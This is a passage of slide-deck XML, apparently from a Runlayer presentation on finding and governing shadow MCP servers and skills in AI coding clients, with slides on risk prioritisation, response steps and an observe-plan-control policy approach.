        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="946200" y="827875"/>
            <a:ext cx="6412200" cy="2772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t/>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="474441"/>
              </a:solidFill>
              <a:latin typeface="Geist Medium"/>
              <a:ea typeface="Geist Medium"/>
              <a:cs typeface="Geist Medium"/>
              <a:sym typeface="Geist Medium"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="225" name="Google Shape;225;p34"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7171925" y="92775"/>
            <a:ext cx="1556150" cy="1556150"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="226" name="Google Shape;226;p34"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="499675" y="1957325"/>
            <a:ext cx="8228400" cy="51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chemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Prevalence</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>        X        MCP Server Risk       X       Organizational Policy        =        Priority</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="227" name="Google Shape;227;p34"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2778025" y="2608925"/>
            <a:ext cx="11001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dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>High</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Medium</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Low</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="228" name="Google Shape;228;p34"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4847825" y="2608925"/>
            <a:ext cx="23241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dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Block Unapproved</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Observe and Migrate</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="229" name="Google Shape;229;p34"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7719300" y="2608925"/>
            <a:ext cx="1100100" cy="116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dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Critical</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>High</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Medium</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Low</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="230" name="Google Shape;230;p34"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="586725" y="2608925"/>
            <a:ext cx="11001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dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>High</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Medium</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Low</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:schemeClr val="dk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4" name="Shape 234"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="235" name="Google Shape;235;p35"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="550350" y="1433650"/>
            <a:ext cx="8629200" cy="15492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chemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Version-pin dependencies</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Supply-chain attacks are ever so relevant these days</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Move to managed infrastructure (gateway/proxy)</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Replace shadow configs with org-managed configs</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Revoke leaked credentials, rotate tokens</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="236" name="Google Shape;236;p35"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="946200" y="359875"/>
            <a:ext cx="7873200" cy="468000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="0" spcFirstLastPara="1" rIns="0" wrap="square" tIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="1C1917"/>
                </a:solidFill>
                <a:latin typeface="Geist Medium"/>
                <a:ea typeface="Geist Medium"/>
                <a:cs typeface="Geist Medium"/>
                <a:sym typeface="Geist Medium"/>
              </a:rPr>
              <a:t>Respond</a:t>
            </a:r>
            <a:endParaRPr sz="3200">
              <a:solidFill>
                <a:srgbClr val="1C1917"/>
              </a:solidFill>
              <a:latin typeface="Geist Medium"/>
              <a:ea typeface="Geist Medium"/>
              <a:cs typeface="Geist Medium"/>
              <a:sym typeface="Geist Medium"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="237" name="Google Shape;237;p35"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="946200" y="827875"/>
            <a:ext cx="6412200" cy="2772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t/>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="474441"/>
              </a:solidFill>
              <a:latin typeface="Geist Medium"/>
              <a:ea typeface="Geist Medium"/>
              <a:cs typeface="Geist Medium"/>
              <a:sym typeface="Geist Medium"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="238" name="Google Shape;238;p35"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6471625" y="2067175"/>
            <a:ext cx="2215175" cy="28994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2" name="Shape 242"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="243" name="Google Shape;243;p36"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="550350" y="1433650"/>
            <a:ext cx="8629200" cy="154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chemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Observe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> - know what's out there</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Review your AI clients (Cursor, Claude Code, Codex) for MCP servers and skills you didn't install</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Scan your whole fleet - identify shadow MCP servers and skills across your organization</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Classify what you find - managed vs. shadow, risk-level each one</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Plan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> - set boundaries</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Draft an AI tooling policy - what's approved, how to request, what happens when shadow usage is found</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Build response playbooks - escalation paths, remediation SLAs</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Control</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> - make it the default</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Centralize MCP and skill management - push approved configs, don't rely on developers to self-manage</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Assert configuration - enforce approved state, detect and remediate drift continuously</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="244" name="Google Shape;244;p36"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="946200" y="359875"/>
            <a:ext cx="7873200" cy="468000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="0" spcFirstLastPara="1" rIns="0" wrap="square" tIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="1C1917"/>
                </a:solidFill>
                <a:latin typeface="Geist Medium"/>
                <a:ea typeface="Geist Medium"/>
                <a:cs typeface="Geist Medium"/>
                <a:sym typeface="Geist Medium"/>
              </a:rPr>
              <a:t>The End</a:t>
            </a:r>
            <a:endParaRPr sz="3200">
              <a:solidFill>
                <a:srgbClr val="1C1917"/>
              </a:solidFill>
              <a:latin typeface="Geist Medium"/>
              <a:ea typeface="Geist Medium"/>
              <a:cs typeface="Geist Medium"/>
              <a:sym typeface="Geist Medium"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="245" name="Google Shape;245;p36"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="946200" y="827875"/>
            <a:ext cx="6412200" cy="2772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t/>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="474441"/>
              </a:solidFill>
              <a:latin typeface="Geist Medium"/>
              <a:ea typeface="Geist Medium"/>
              <a:cs typeface="Geist Medium"/>
              <a:sym typeface="Geist Medium"/>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9" name="Shape 249"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="250" name="Google Shape;250;p37" title="extrude-group.png"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-2777200" y="721550"/>
            <a:ext cx="6299602" cy="4033451"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="251" name="Google Shape;251;p37" title="Runlayer (dark bg).png"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="386275" y="113950"/>
            <a:ext cx="1535500" cy="343250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="252" name="Google Shape;252;p37"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2097649" y="897863"/>
            <a:ext cx="5701725" cy="32404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6" name="Shape 256"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="257" name="Google Shape;257;p38" title="extrude-group.png"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-2777200" y="721550"/>
            <a:ext cx="6299602" cy="4033451"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="258" name="Google Shape;258;p38" title="Runlayer (dark bg).png"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
